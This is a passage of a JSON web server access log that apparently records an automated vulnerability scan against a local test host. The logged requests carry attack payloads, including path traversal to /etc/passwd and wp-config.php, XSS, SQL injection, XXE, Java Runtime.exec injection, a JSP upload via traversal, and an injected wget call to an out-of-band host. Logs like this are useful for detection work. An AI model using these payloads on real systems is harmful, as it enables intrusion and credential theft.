+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/53 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"email=springbird@qq.com&password=springbird&remeber=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"\x0D\x0A\x0D\x0A\x0D\x0A]>\x0D\x0A\x0D\x0A&xxe;\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/tmm_db_migrate/tmm_db_migrate.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/download/resource?resource=/profile/../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"phps_query=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /search HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.090","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /_next/../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.008","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5cexample.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"email=%27%3D%27%27or%27%40email.com&password=%27%3D%27%27or%27&btn_login=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.135","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1/login.php", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\x22'; wget http://ca2tuc8smpv1g2s80ca06gzdbzpaeo6im.oast.pro #","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.121","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.109","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/54 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.084","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.132","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /modules/system/assets/js/framework.combined-min.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.085","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat+%2Fetc%2Fpasswd')]=nuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /account HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/download/resource?resource=/profile/../../../../Windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5chttp://127.0.0.1example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /thruk/cgi-bin/login.cgi?thruk/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/force-download.php?file=../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"{\x22hapi\x22:{\x22username\x22:\x22Administrator\x22,\x22password\x22:\x22any_password\x22,\x22language\x22:\x22en\x22,\x22mode\x22:\x22gui\x22, \x22usesshkey\x22:true, \x22privatekey\x22:\x22any_privateky\x22, \x22passphrase\x22:\x22any_passphase\x22,\x22settings\x22:{\x22output_filter\x22:\x22passed\x22,\x22port_number\x22:\x22444\x22}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /session/create HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.099","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\x22'; wget http://ca2tuc8smpv1g2s80ca0gkonnxmss6dsw.oast.pro #","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.089","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/55 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.083","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type+C%3A%2FWindows%2Fwin.ini')]=nuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /account HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /welcome HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../example.com HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"data%5Bbutton%5D=submit&data%5BUser%5D%5Busername%5D=spadmin&data%5BUser%5D%5Bpassword%5D=admin123","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /users/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1.24/version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.development.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /check_mk/login.py HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /files.md5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/apidocs/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"--------------------------aadc326f7ae3eac3\x0D\x0AContent-Disposition: form-data; name=\x22name\x22; filename=\x22../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/29N5EhniacYmegyQzVyw3rEBHny.jsp\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0A<%\x0D\x0Aout.println(\x22CVE-2022-26352\x22);\x0D\x0A%>\x0D\x0A--------------------------aadc326f7ae3eac3--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/content/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /device.rsp?opt=user&cmd=list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tool/view/phpinfo.view.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/security.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sidekiq/queues/%22onmouseover=%22alert%28nuclei%29%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/56 